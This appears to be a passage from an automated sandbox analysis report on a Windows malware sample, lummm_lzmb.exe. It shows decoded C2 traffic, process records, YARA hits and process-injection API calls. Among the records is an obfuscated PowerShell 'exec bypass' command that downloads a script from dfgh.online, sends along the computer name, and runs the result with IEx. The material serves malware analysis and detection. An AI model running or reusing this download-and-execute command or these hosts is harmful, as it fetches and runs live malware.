2025-01-15 16:25:24 UTC	115	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61 26 68 77 69 64 3d 44 30 37 46 41 33 41 39 42 32 35 45 39 41 35 45 44 41 36 43 32 30 32 44 30 32 41 33 30 46 32 30 Data Ascii: act=get_message&ver=4.0&lid=jMw1IE--SHELLS&j=aa77e78b6b0dd1b2226e7b799532ab3a&hwid=D07FA3A9B25E9A5EDA6C202D02A30F20
2025-01-15 16:25:25 UTC	1121	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:25:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ems7b2q9r1glfhibpq63e250d6; expires=Sun, 11 May 2025 10:12:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RYfDt6Irssm0FspM5dqbN2FhSRL5ShKhwxdm2njfRqlb28U7d3yFm22wUbZFCQI0dziNMGmxIkWLT2f7uBpD64Z4V09K%2BABkC%2FVY9eCK2qQK7A6clEfvT5HiZdsnyg3vpLcl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902738baee95ac36-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13748&min_rtt=13748&rtt_var=5156&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1016&delivery_rate=212348&cwnd=32&unsent_bytes=0&cid=af7a0081f2abd041&ts=472&x=0"
2025-01-15 16:25:25 UTC	218	IN	Data Raw: 64 34 0d 0a 53 7a 39 6c 34 36 34 6b 6b 6c 6f 48 45 32 78 52 59 47 77 54 72 37 52 37 35 46 76 4a 36 54 57 55 77 59 50 78 72 35 30 77 64 62 73 51 52 45 65 57 6a 42 36 77 4d 6e 4e 6e 48 43 4a 61 4d 44 7a 7a 6d 78 69 42 50 4c 7a 48 52 76 79 75 38 36 32 41 70 51 56 43 6a 33 6b 4a 56 39 65 61 45 73 35 31 64 33 74 43 4a 52 67 59 4d 59 4f 57 48 5a 42 35 38 39 73 5a 74 71 53 68 79 35 37 67 48 41 36 5a 50 68 31 66 77 63 5a 51 35 69 70 30 4b 54 42 2b 50 45 4e 34 77 39 30 4c 67 7a 53 6e 6e 46 32 36 73 75 75 65 33 38 45 66 48 4e 55 2f 59 41 61 50 33 6e 76 68 4d 6d 59 39 47 43 6b 55 54 6a 2b 4e 30 67 2f 47 59 66 6e 46 46 2f 48 6a 75 63 48 53 77 41 3d 3d 0d 0a Data Ascii: d4Sz9l464kkloHE2xRYGwTr7R75FvJ6TWUwYPxr50wdbsQREeWjB6wMnNnHCJaMDzzmxiBPLzHRvyu862ApQVCj3kJV9eaEs51d3tCJRgYMYOWHZB589sZtqShy57gHA6ZPh1fwcZQ5ip0KTB+PEN4w90LgzSnnF26suue38EfHNU/YAaP3nvhMmY9GCkUTj+N0g/GYfnFF/HjucHSwA==
2025-01-15 16:25:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49745	185.161.251.21	443	6780	C:\Users\user\Desktop\lummm_lzmb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:25:26 UTC	201	OUT	GET /8574262446/ph.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: cegu.shop
2025-01-15 16:25:26 UTC	249	IN	HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Wed, 15 Jan 2025 16:25:26 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 329 Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT Connection: close ETag: "676c9e2a-149" Accept-Ranges: bytes
2025-01-15 16:25:26 UTC	329	IN	Data Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.

Target ID:	0
Start time:	11:24:58
Start date:	15/01/2025
Path:	C:\Users\user\Desktop\lummm_lzmb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\lummm_lzmb.exe"
Imagebase:	0x990000
File size:	870'400 bytes
MD5 hash:	0DF5F44040C57CB4F63F442AE2C8D904
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1714027294.0000000002EEA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1730312615.0000000006BD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:25:01
Start date:	15/01/2025
Path:	C:\Users\user\Desktop\lummm_lzmb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\lummm_lzmb.exe"
Imagebase:	0x310000
File size:	870'400 bytes
MD5 hash:	0DF5F44040C57CB4F63F442AE2C8D904
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:25:25
Start date:	15/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; }
Imagebase:	0xe10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:25:25
Start date:	15/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	25%
Total number of Nodes:	12
Total number of Limit Nodes:	0

Executed Functions

Function 056E091D Relevance: 4.8, Strings: 3, Instructions: 1033COMMON

Download Yara Rule

Strings

d%dq, xrefs: 056E160F
d%dq, xrefs: 056E1AD2
$^q, xrefs: 056E1DCB

Memory Dump Source

Source File: 00000000.00000002.1727750626.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56e0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: d%dq$d%dq$$^q
API String ID: 0-3870310762
Opcode ID: 009dd877b45d12a85b432bd57dd3ec85f224f08fc0cf23a737aa26df2adfdab1
Instruction ID: a3ef065f8f30ba42047f85152566406e19a87563f939164e83ec10bc0d853616
Opcode Fuzzy Hash: 009dd877b45d12a85b432bd57dd3ec85f224f08fc0cf23a737aa26df2adfdab1
Instruction Fuzzy Hash: 11B2D838E02A18CFD7A0DF59D988E99BBF2BB49305F09C2A5D4199B355D730E981DF40

Function 07512780 Relevance: 1.6, APIs: 1, Instructions: 59
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtResumeThread.NTDLL(?,?), ref: 075127F6

Memory Dump Source

Source File: 00000000.00000002.1731487694.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_lummm_lzmb.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 63b8464d2e2efb3704a56e10fbfbbb5c6392e82c70243f065407ef65cb12a88f
Instruction ID: a3fcd934fa429a24b321a07a7bd3b5494f9506f8e761751e472e59aacf37813a
Opcode Fuzzy Hash: 63b8464d2e2efb3704a56e10fbfbbb5c6392e82c70243f065407ef65cb12a88f
Instruction Fuzzy Hash: 622127B1D002499FDB10DFAAC4846EFFBF8FB48320F20842AD459A7200C774A944CFA5

Function 07512788 Relevance: 1.6, APIs: 1, Instructions: 54
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtResumeThread.NTDLL(?,?), ref: 075127F6

Memory Dump Source

Source File: 00000000.00000002.1731487694.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_lummm_lzmb.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 79c478239807b819f25fb4608dbf07fa306f9bdc04958094a14e7697a3612fa9
Instruction ID: 90f3fde62c8b90fa7d723cc4070357bdafccd5653eb351dd83eaccfb17e38acc
Opcode Fuzzy Hash: 79c478239807b819f25fb4608dbf07fa306f9bdc04958094a14e7697a3612fa9
Instruction Fuzzy Hash: 841106B1D002499BDB10DFAAC4846DEFBF4BB48320F10842AD459A7250C778A944CFA5

Function 0758F668 Relevance: 1.5, Strings: 1, Instructions: 276
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Deq, xrefs: 0758F76D

Memory Dump Source

Source File: 00000000.00000002.1731510720.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: Deq
API String ID: 0-948982800
Opcode ID: 24fea46c621e385d770d81a1d55b603cead515864ab766164bdba41ce9ace1ce
Instruction ID: ba86b4cbe1fd10c6f52e14674a5118244163f91b1c09bf5a3cf1c348d0763667
Opcode Fuzzy Hash: 24fea46c621e385d770d81a1d55b603cead515864ab766164bdba41ce9ace1ce
Instruction Fuzzy Hash: D6D1C1B4E01219CFDB54DFA9D984A9DBBB2BF88304F1081A9D409AB365DB31AD85CF41

Function 012B1FB0 Relevance: 1.5, Strings: 1, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

TJcq, xrefs: 012B2030

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: TJcq
API String ID: 0-1911830065
Opcode ID: d304112f414f2fc86770e7cd4002eea94cd14619a5277903edace527d3153b47
Instruction ID: 8a168e878ac8a9344f5f709c25d0799e5ee19d5534fde08f6b41cbd1c1166906
Opcode Fuzzy Hash: d304112f414f2fc86770e7cd4002eea94cd14619a5277903edace527d3153b47
Instruction Fuzzy Hash: C4718D30A34205CFDB09CB69C4D4AEEBBB2FF59300F1588A6D116EB2A5CA71EC45CB51

Function 012BAB68 Relevance: 1.3, Instructions: 1262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7b29ba1c1489e65985afab2af91579757fd72f4bb2e9dcdf97a0bc1ec780d19
Instruction ID: 5f312236163d266e452c41a00cdddcda4c54a153ee1003d98ac3c1e35316087c
Opcode Fuzzy Hash: a7b29ba1c1489e65985afab2af91579757fd72f4bb2e9dcdf97a0bc1ec780d19
Instruction Fuzzy Hash: 29C27F7492461ACFCB64DFA8D8D06ECB7B1FB45394F1046AAD11AEB381EB349981CF41

Function 012BB5F3 Relevance: .6, Instructions: 615COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b08b9f713b3e9a63d73f68be207241e4496ac456faf0c9a7302fc64f2c140126
Instruction ID: 27462ebbafc5fefd9eb956d817039d0819e859d9cb90cf97c640b222cbbfbb94
Opcode Fuzzy Hash: b08b9f713b3e9a63d73f68be207241e4496ac456faf0c9a7302fc64f2c140126
Instruction Fuzzy Hash: 52625B7492461A8FDB64DFA8D8D47ECF7B1FB48340F2046A9C51AAB381EB349981CF41

Function 012BB728 Relevance: .6, Instructions: 574COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e3a8f5e5c7a2f7dc32b0caf36748d662ed5b50e955850e9711bfe40c3ae5b15
Instruction ID: 4b01e4f193715c97696a196bd618de22b9ae0148bc00a963c21e2763cf0d4529
Opcode Fuzzy Hash: 7e3a8f5e5c7a2f7dc32b0caf36748d662ed5b50e955850e9711bfe40c3ae5b15
Instruction Fuzzy Hash: A9525C7492461A8FDB64DFA8D8D46ECF7B1FB48340F2046A9C51AA7381EB349E81CF41

Function 012BB6FF Relevance: .6, Instructions: 568COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0bc3f46a3bf878ac56347d05dfd87b98612ff8ba1a1d35bffc32af9978fcb1c
Instruction ID: 9799554f67a241b0f2812d2dbb9fe400e6b795155435ed2a79355e613512c2cd
Opcode Fuzzy Hash: b0bc3f46a3bf878ac56347d05dfd87b98612ff8ba1a1d35bffc32af9978fcb1c
Instruction Fuzzy Hash: B0525C7492561A8FDB64DFA8D8D46ECF7B1FB48340F2046A9C51AA7381EB349E81CF41

Function 012BB868 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3548229bb356c081517a620a5b974780d85021b9687fccc957badf73d588cb3
Instruction ID: e97cee1773169d4d0b116db2e2c1e2e83064000112013e33f10eed5420b54092
Opcode Fuzzy Hash: f3548229bb356c081517a620a5b974780d85021b9687fccc957badf73d588cb3
Instruction Fuzzy Hash: D0425B7492461A8FCB64DFA8D8D07ECF7B1FB49340F2046A9C51AA7381EB349A81CF41

Function 012BA150 Relevance: .5, Instructions: 465COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49a7320ff93828891006a6aa0dddf6e7b0ba4dae0b0bed93c7a6f2317c36442d
Instruction ID: 57745cd10df7dbdfbd65f14658ab2fab96a08d01e2d5a9639361916c83fa4c02
Opcode Fuzzy Hash: 49a7320ff93828891006a6aa0dddf6e7b0ba4dae0b0bed93c7a6f2317c36442d
Instruction Fuzzy Hash: 4D226D78A21616CFC324DF18C5D59A5F7B2BB84385F0AC3AAD1698F642C731E885DB81

Function 0758F3A0 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731510720.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2804c1efe096c12f060722366e560a3a899d466fe29313771320803d6c73ef8f
Instruction ID: 810cb5221b5fe89630605d0edcbe1bcf26ad7a174cfb909df23fa6c1370c944d
Opcode Fuzzy Hash: 2804c1efe096c12f060722366e560a3a899d466fe29313771320803d6c73ef8f
Instruction Fuzzy Hash: 1B5126B4E012098BCB44DFA9D5856EEBBF2FF89300F249525E409B7394DB349981CB90

Function 012B23EF Relevance: 3.9, Strings: 3, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 012B23F7
TJcq, xrefs: 012B240F
@, xrefs: 012B24B6

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: @$TJcq$Te^q
API String ID: 0-733111392
Opcode ID: 8a56c797733f62ec905621d09e8785850aa4c8ec6ac0c641988a936e106d6f83
Instruction ID: 4f65d956be95840402ea829a338870aeab580e5c8b8655f784e351151dd0fa28
Opcode Fuzzy Hash: 8a56c797733f62ec905621d09e8785850aa4c8ec6ac0c641988a936e106d6f83
Instruction Fuzzy Hash: E2611534B20215CFDB18DF69E898BADBBF2EF88754F144069E506DB3A5CA70EC418B41

Function 02E44140 Relevance: 3.7, Strings: 2, Instructions: 1151COMMON

Download Yara Rule

Strings

4'^q, xrefs: 02E44EF9
4'^q, xrefs: 02E44EE9

Memory Dump Source

Source File: 00000000.00000002.1713961744.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e40000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 320ab42f13d37b3be8073946048fafe05ec0ac07a76fb486d3fe401423eedd69
Instruction ID: 832c73791fa8e97bcea2af17d576aa6d3f4dcec7ce80a897ac5d3df374d5c7b7
Opcode Fuzzy Hash: 320ab42f13d37b3be8073946048fafe05ec0ac07a76fb486d3fe401423eedd69
Instruction Fuzzy Hash: 4CA28E70E49389DFDB16CBA4E859BAE7FB1BF46304F14909AE501AB2E1CB345845CF21

Function 02E45748 Relevance: 3.0, Strings: 2, Instructions: 488
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 02E45DEB
4'^q, xrefs: 02E45DDB

Memory Dump Source

Source File: 00000000.00000002.1713961744.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e40000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: c5ca40e3a4dc8a753cde40773501bb76280da2e02a16e7af94ab9a3f60c71fbc
Instruction ID: d49654c7802802091a949faf02093e289f7e359ae6b44a3318dfe7d07a4ae307
Opcode Fuzzy Hash: c5ca40e3a4dc8a753cde40773501bb76280da2e02a16e7af94ab9a3f60c71fbc
Instruction Fuzzy Hash: 8A22E330D05218CFCB68DFA4D9546EDBBB6BF49305F60A06AD41AAB269CF345D49CF10

Function 056E1813 Relevance: 2.8, Strings: 2, Instructions: 283
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d%dq, xrefs: 056E1AD2
$^q, xrefs: 056E1DCB

Memory Dump Source

Source File: 00000000.00000002.1727750626.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56e0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: d%dq$$^q
API String ID: 0-3734683506
Opcode ID: 7a1520ae1df9fb8a2426380e70cf9b897ad734a92d7337d1e784d25dc5661ca5
Instruction ID: 8d4d1190f6c7b15972947e833eb0d833b64eefe778a7b8064b032e869fc62293
Opcode Fuzzy Hash: 7a1520ae1df9fb8a2426380e70cf9b897ad734a92d7337d1e784d25dc5661ca5
Instruction Fuzzy Hash: 07E1A474A02628CFDBA4DF19C984AE9BBF2BB49301F1582E5D408AB355D731EE85DF40

Function 07512169 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07512200

Memory Dump Source

Source File: 00000000.00000002.1731487694.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_lummm_lzmb.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 90282989c6384d9c95745b72827c0b6333dc0186da57368be1f313748c579c44
Instruction ID: d48cdefcdb71346a4ec76406e96450f1d26ed4594eacf74a5b12cf756404553f
Opcode Fuzzy Hash: 90282989c6384d9c95745b72827c0b6333dc0186da57368be1f313748c579c44
Instruction Fuzzy Hash: D3216BB5900359DFDB10CFA9C881BEEBBF5FF48310F10842AE958A7240C7789554CBA4

Function 07512170 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07512200

Memory Dump Source

Source File: 00000000.00000002.1731487694.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_lummm_lzmb.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: da7b94b949ee57ddac692697d343df417de7a0f3df4016f5e10c589026286883
Instruction ID: 24429e2ba299ea56790fb248c03202fe014375e9ce3fe740c9af96f466212d68
Opcode Fuzzy Hash: da7b94b949ee57ddac692697d343df417de7a0f3df4016f5e10c589026286883
Instruction Fuzzy Hash: E72169B19003599FDB10CFA9C881BEEBBF5FF48310F10842AE958A7240C7789944CBA4

Function 07511959 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 075119DE

Memory Dump Source

Source File: 00000000.00000002.1731487694.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_lummm_lzmb.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 35337a14ee40cae01c0365b61148bda78147132f630cee8247d1be7d9ad76277
Instruction ID: 4e09993aa40ae1021427b517d1b4b0bee51f9f21d817c675becf64603d357a77
Opcode Fuzzy Hash: 35337a14ee40cae01c0365b61148bda78147132f630cee8247d1be7d9ad76277
Instruction Fuzzy Hash: BD2168B19003099FDB10DFAAC485BEEBBF4FF48364F10842AD559A7240DB789985CFA4

Function 07511960 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 075119DE

Memory Dump Source

Source File: 00000000.00000002.1731487694.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_lummm_lzmb.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 4e4d24a9f81ed99550c9c632280804013f96f747efdd0f443d6495bd77b10d84
Instruction ID: 811176cab6cd88fcc5bba193d97b62840a1bad273936e0169f1a74e25e47fb9f
Opcode Fuzzy Hash: 4e4d24a9f81ed99550c9c632280804013f96f747efdd0f443d6495bd77b10d84
Instruction Fuzzy Hash: AD2138B19002099FDB10DFAAC4857EEBBF5FF48364F14842AD559A7240CB789984CFA4

Function 07511EF8 Relevance: 1.6, APIs: 1, Instructions: 58
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07511F6E

Memory Dump Source

Source File: 00000000.00000002.1731487694.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_lummm_lzmb.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0545ece37f6a2ea92bd2ab533742b638ad8a8a9a8c80a2f9b805033ef8aefc05
Instruction ID: 5439653744c1e1da77dee564413b4215f7c93a78fdd399cd4211eea6e1e31782
Opcode Fuzzy Hash: 0545ece37f6a2ea92bd2ab533742b638ad8a8a9a8c80a2f9b805033ef8aefc05
Instruction Fuzzy Hash: 951147B680064D9FCB10DFA9C845BEFBBF5FF48324F10841AE659A7250CB759980CBA5

Function 07511F00 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07511F6E

Memory Dump Source

Source File: 00000000.00000002.1731487694.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_lummm_lzmb.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 08f830adf24bceee922f62f3a2c51b679609124e952cc57fc8abc2f6ce3a4e75
Instruction ID: c99596a722a10f6c9849fc1967493f0b7d7e7861b3523430f37f650c7b23f457
Opcode Fuzzy Hash: 08f830adf24bceee922f62f3a2c51b679609124e952cc57fc8abc2f6ce3a4e75
Instruction Fuzzy Hash: 321126B69002499FDB10DFAAC844BDEBBF5EF88324F10841AE559A7250C775A944CFA4

Function 012B37A5 Relevance: 1.4, Strings: 1, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

pbq, xrefs: 012B37B4

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: pbq
API String ID: 0-3896149868
Opcode ID: 1e337433665b1669caca32a2fc5d0543a932d2123fb2efec4f976ff7f610e325
Instruction ID: cab60b30cc47912b187ad2fa6b9ca073d2c2a985027b3ee5c090f30c55b0aa61
Opcode Fuzzy Hash: 1e337433665b1669caca32a2fc5d0543a932d2123fb2efec4f976ff7f610e325
Instruction Fuzzy Hash: 3241B276610115EFDB06DF94D984DA9BBB2FF4C324B1640A4E609AF276C732EC61EB40

